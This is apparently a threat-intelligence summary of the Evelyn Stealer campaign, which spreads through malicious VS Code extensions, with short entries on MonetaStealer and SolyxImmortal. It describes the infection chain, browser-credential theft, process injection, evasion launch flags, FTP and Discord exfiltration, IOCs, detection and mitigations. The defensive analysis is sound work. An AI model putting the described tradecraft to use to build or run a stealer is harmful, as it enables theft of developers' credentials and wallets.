Full Report
Cybersecurity researchers have disclosed details of a malware campaign that's targeting software developers with a new information stealer called Evelyn Stealer by weaponizing the Microsoft Visual Studio Code (VS Code) extension ecosystem. "The malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data. Compromised developer
Analysis Summary
# Tool/Technique: Evelyn Stealer
## Overview
Evelyn Stealer is a newly disclosed information-stealing malware primarily targeting software developers by masquerading within the Microsoft Visual Studio Code (VS Code) extension ecosystem. Its main goal is to exfiltrate sensitive developer data, credentials, and cryptocurrency-related information from compromised environments.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (implied by use of PowerShell, DLLs, and Windows process injection into `grpconv.exe`)
- Capabilities: Data exfiltration, process injection, anti-analysis/anti-VM checks, browser credential theft.
- First Seen: The campaign activity was first documented last month (relative to the article date of Jan 20, 2026) by Koi Security, with researchers from Trend Micro publishing details this Monday.
## MITRE ATT&CK Mapping
*Note: Specific T-IDs for the initial delivery via VS Code extensions are not provided, but the subsequent stages are mapped below.*
- **TA0001 - Initial Access** (Delivery via compromised extensions)
- **T1189 - Drive-by Compromise** (Potentially applicable if extensions download payloads upon installation/use)
- **TA0005 - Defense Evasion**
- **T1027 - Obfuscated Files or Information** (Decryption of second-stage payload)
- **TA0003 - Persistence**
- **T1543.003 - Windows Service: Service Registration** (Not explicitly confirmed, but common for stealers)
- **TA0009 - Collection**
- **T1005 - Data from Local System** (Collecting clipboard content, system info, etc.)
- **TA0010 - Exfiltration**
- **T1041 - Exfiltration Over C2 Channel** (Using FTP for exfiltration)
- **TA0004 - Privilege Escalation** (Context: Targeting developers with high-privilege access)
## Functionality
### Core Capabilities
- **Initial Delivery:** Delivered via malicious VS Code extensions (e.g., `BigBlack.bitcoin-black`, `BigBlack.codo-ai`, `BigBlack.mrbigblacktheme`) which drop a malicious DLL (`Lightshot.dll`).
- **Staging:** The DLL executes a hidden PowerShell command to fetch and execute a second-stage payload (`runtime.exe`).
- **Infection/Execution:** `runtime.exe` decrypts and injects the main stealer payload into a legitimate Windows process (`grpconv.exe`) in memory.
- **Data Collection:** Gathers a wide array of sensitive information, including clipboard content, installed applications, cryptocurrency wallet data, running processes, system information, screenshots, stored Wi-Fi credentials, and credentials/cookies from Google Chrome and Microsoft Edge.
- **Exfiltration:** Bundles collected data into a ZIP file and exfiltrates it via FTP to a remote server.
- **Execution Control:** Creates a mutex object to ensure only one instance of the malware runs at a time.
### Advanced Features
- **Anti-Analysis/Anti-VM:** Implements safeguards to detect forensic analysis environments and virtual machines.
- **Process Termination:** Actively terminates running browser processes to ensure a clean extraction of cookies and credentials.
- **Browser Evasion:** Launches browsers using specific command-line flags designed to bypass security features and evade detection: `--headless=new`, `--disable-gpu`, `--no-sandbox`, `--disable-extensions`, `--disable-logging`, `--silent-launch`, `--no-first-run`, `--disable-popup-blocking`, and positioning the window off-screen (`--window-position=-10000,-10000`) while minimizing size (`--window-size=1,1`).
## Indicators of Compromise
- File Hashes: [Not provided in the excerpt]
- File Names: `Lightshot.dll` (downloader), `runtime.exe` (second stage executable)
- Registry Keys: [Not provided in the excerpt]
- Network Indicators: `server09[.]mentality[.]cloud` (C2 server)
- Behavioral Indicators: Use of PowerShell to fetch remote payloads; injection into `grpconv.exe`; FTP transfer of ZIP files; creation of a mutex object.
## Associated Threat Actors
The actors deploying Evelyn Stealer are not explicitly named, but the campaign targets high-value software developer organizations with access to production systems or cloud resources.
## Detection Methods
- **Signature-based detection:** Signatures for the known DLL and executable names, or hashes once identified.
- **Behavioral detection:** Monitoring for process injection into `grpconv.exe`, the specific command-line arguments used when launching browsers, FTP activity initiated by non-standard processes, and the creation of specific mutexes.
- **YARA rules:** Rules targeting the unique embedded strings or decryption routines used by the payload.
## Mitigation Strategies
- **Prevention measures:** Strict vetting and limited installation of VS Code extensions, especially from untrusted sources. Implement least privilege access for developers.
- **Hardening recommendations:** Enhance monitoring of process injection activity (e.g., using EDR solutions). Restrict outbound FTP connections from developer workstations unless explicitly required. Audit developer environments for unusual execution chains involving DLL loading and PowerShell.
## Related Tools/Techniques
Other newly disclosed Python-based stealers mentioned in the context:
- **MonetaStealer:** Also capable of targeting Apple macOS systems.
- **SolyxImmortal:** Leverages legitimate system APIs and Discord webhooks for exfiltration.
---
# Tool/Technique: MonetaStealer (Mentioned Contextually)
## Overview
MonetaStealer is a new Python-based information stealer malware family, mentioned alongside Evelyn Stealer, noted for its capability to target Apple macOS systems in addition to other platforms.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Apple macOS (and implied others)
- Capabilities: Data theft.
- First Seen: Contextually recent with Evelyn Stealer disclosures.
## MITRE ATT&CK Mapping
*Mapping based on general Stealer TTPs, specific details unknown.*
- **TA0009 - Collection**
- **TA0010 - Exfiltration**
## Functionality
### Core Capabilities
- Comprehensive data theft across platforms including macOS.
### Advanced Features
- [Not detailed in the excerpt]
## Indicators of Compromise
- [Not provided in the excerpt]
## Associated Threat Actors
- [Not provided in the excerpt]
## Detection Methods
- [Not provided in the excerpt]
## Mitigation Strategies
- [General hardening against information stealers]
## Related Tools/Techniques
- Evelyn Stealer
- SolyxImmortal
---
# Tool/Technique: SolyxImmortal (Mentioned Contextually)
## Overview
SolyxImmortal is a Python-based malware family emphasizing stealth and long-term access. It operates entirely in user space, leveraging legitimate system APIs and third-party libraries to extract user data, which is then exfiltrated via attacker-controlled Discord webhooks.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (implied by general context, user space operation)
- Capabilities: Stealthy data extraction and exfiltration using Discord C2.
- First Seen: Contextually recent with Evelyn Stealer disclosures.
## MITRE ATT&CK Mapping
*Mapping based on disclosed C2 and operational style.*
- **TA0003 - Persistence** (Emphasis on long-term access)
- **TA0005 - Defense Evasion** (Operating entirely in user space, relying on trusted platforms)
- **TA0010 - Exfiltration**
- **T1567.002 - Exfiltration Over Web Service: Social Media Service** (Using Discord webhooks)
## Functionality
### Core Capabilities
- Extracts sensitive user data using legitimate system APIs and third-party libraries.
- Exfiltrates collected data to attacker-controlled Discord webhooks.
### Advanced Features
- Design emphasizes stealth, reliability, and long-term access over rapid execution.
- Reduced likelihood of immediate detection by operating solely in user space and using trusted platforms (Discord) for C2.
## Indicators of Compromise
- Network Indicators: Attacker-controlled Discord webhooks.
## Associated Threat Actors
- [Not provided in the excerpt]
## Detection Methods
- Behavioral monitoring for unusual use of third-party libraries for data exfiltration.
- Monitoring API calls related to data access coupled with outbound traffic to Discord URLs.
## Mitigation Strategies
- Implement EDR to monitor legitimate libraries being misused for data gathering.
- Network filtering for suspicious outbound connections to Discord webhook URLs if not used for legitimate business purposes.
## Related Tools/Techniques
- Evelyn Stealer
- MonetaStealer